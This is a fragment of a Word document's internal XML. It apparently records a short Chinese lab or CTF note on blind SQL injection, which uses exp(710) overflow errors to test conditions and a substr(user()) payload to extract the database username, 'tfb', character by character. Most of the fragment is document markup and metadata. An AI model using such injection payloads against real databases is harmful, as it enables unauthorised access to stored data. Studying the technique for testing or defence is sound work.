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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="394271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22236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抓包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用-if(1=1,1,exp(710)) 和 -if(1=2.1,exp(709))来判断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="162179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06438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构造Payload爆出用户名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||if(substr(user(),1,1)=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,1,exp(710))||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="171450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22846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422846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228465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用户名tfb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5656E"/>
    <w:rsid w:val="20F85F56"/>
    <w:rsid w:val="30032221"/>
    <w:rsid w:val="3B4D0054"/>
    <w:rsid w:val="484F27D6"/>
    <w:rsid w:val="500A28C8"/>
    <w:rsid w:val="55393E6B"/>
    <w:rsid w:val="613C6816"/>
    <w:rsid w:val="6D0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</Words>
  <Characters>107</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>9</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>110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2022-03-25T06:04:42Z</dcterms:created>
  <dc:creator>ASUS</dc:creator>
  <cp:lastModifiedBy>冬夏</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-25T06:15:29Z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689088E40AF14F01A0AEEBBD23DF5D4A</vt:lpwstr>
  </property>
</Properties>
</file>